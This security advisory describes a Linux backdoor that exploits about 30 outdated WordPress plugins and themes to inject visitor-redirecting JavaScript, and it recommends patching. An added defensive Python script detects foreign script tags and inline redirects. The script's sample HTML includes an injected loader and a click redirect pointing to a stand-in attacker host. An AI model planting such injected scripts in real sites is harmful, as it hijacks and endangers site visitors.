Description
A previously unidentified Linux malware strain that compromises weak systems is threatening WordPress websites by taking advantage of vulnerabilities in over twenty plugins and themes.
Summary
According to reports, if websites run older versions of these add-ons that lack the necessary patches, malicious JavaScript is injected into the targeted web pages, causing visitors to be diverted to other websites when they click on any part of the attacked page.
The attacks involve weaponizing a list of known security vulnerabilities in 19 different plugins and themes that are installed on a WordPress site, using them to deploy an implant that can target a specific website to further expand the network. The implant is also capable of injecting JavaScript code retrieved from a remote server to redirect the site's visitors to an arbitrary website of the attacker's choice.
According to Doctor Web, a second version of the backdoor was identified which uses a new command-and-control (C2) domain as well as an updated list of flaws spanning 11 additional plugins, taking the total to 30.
The targeted plugins and themes include –
Easy WP SMTP
WP GDPR Compliance
Newspaper (CVE-2016-10972)
Thim Core
WP Live Chat Support
Smart Google Code Inserter (discontinued as of January 28, 2022)
Total Donations
Post Custom Templates Lite
Yuzo Related Posts
Yellow Pencil Visual CSS Style Editor
WordPress Ultimate FAQ (CVE-2019-17232 and CVE-2019-17233)
WP-Matomo Integration (WP-Piwik)
ND Shortcodes
WP Live Chat
WP Quick Booking Manager
Coming Soon Page and Maintenance Mode
Hybrid
Simple Fields
Delucks SEO
Poll, Survey, Form & Quiz Maker by OpinionStage
Social Metrics Tracker
WPeMatico RSS Feed Fetcher
Rich Reviews
Live Chat with Messenger Customer Chat by Zotabox
Blog Designer
Brizy
FV Flowplayer Video Player
WooCommerce
Coming Soon Page & Maintenance Mode
Onetone
It is unclear whether the alleged inclusion of a brute-force approach for WordPress administrator accounts is a holdover from an earlier version or a feature that has not yet been deployed in either form.
If such a feature is added to subsequent versions of the backdoor, cybercriminals would also be able to compromise some websites that run current plugin versions with the vulnerabilities already fixed.
Remediation
WordPress users are recommended to keep all the components of the platform up to date, including third-party add-ons and themes. It is also advised to use strong and unique logins and passwords to secure their accounts.
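Beyond patching, administrators can check rendered page output for the symptoms described above: script tags loading from hosts the site does not use, and inline scripts that redirect visitors. The following is an added example (not from the advisory or from Doctor Web); the allowed-host list and the sample HTML are constructed for illustration.

```python
"""Flag <script> tags in a WordPress page that load from unexpected hosts
or that contain visitor-redirect logic (added example, constructed data)."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts this site legitimately loads scripts from (assumed; adjust per site).
ALLOWED_HOSTS = {"example-site.test", "cdnjs.cloudflare.com"}
# Heuristic for inline JavaScript that sends the visitor elsewhere.
REDIRECT_RE = re.compile(
    r"(window\.|document\.)?location(\.href)?\s*=|location\.replace\(", re.I)

class ScriptAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []      # list of (kind, detail) tuples
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        self._in_script = True
        src = dict(attrs).get("src") or ""
        # Only absolute or scheme-relative URLs can point off-site.
        if src.lower().startswith(("http://", "https://", "//")):
            host = urlparse(src).hostname or ""
            if host not in ALLOWED_HOSTS:
                self.findings.append(("external-script", src))

    def handle_data(self, data):
        if self._in_script and REDIRECT_RE.search(data):
            self.findings.append(("inline-redirect", data.strip()[:60]))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

def audit_html(html):
    """Return findings for one page's HTML."""
    parser = ScriptAuditor()
    parser.feed(html)
    return parser.findings

# Constructed sample: one legitimate script, one injected loader, one redirect.
SAMPLE = """<html><head>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
<script src="//attacker-c2.invalid/load.js"></script>
</head><body>
<script>document.body.onclick=function(){window.location.href='https://attacker-c2.invalid/';};</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in audit_html(SAMPLE):
        print(kind, detail)
```

Run it against pages fetched from the live site (or against post content exported from the database) and review every finding; the allowlist must be maintained as the site's legitimate scripts change.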
The Guyana National CIRT recommends that users and administrators review this alert and apply it where necessary.
References
News Alerts. (2022, December 30). Linux backdoor malware infects WordPress-based websites. Retrieved from DrWeb: https://news.drweb.com/show/?i=14646&lng=en&c=23
Lakshmanan, R. (2023, January 3). WordPress Security Alert: New Linux Malware Exploiting Over Two Dozen CMS Flaws. Retrieved from TheHackerNews: https://thehackernews.com/2023/01/wordpress-security-alert-new-linux.html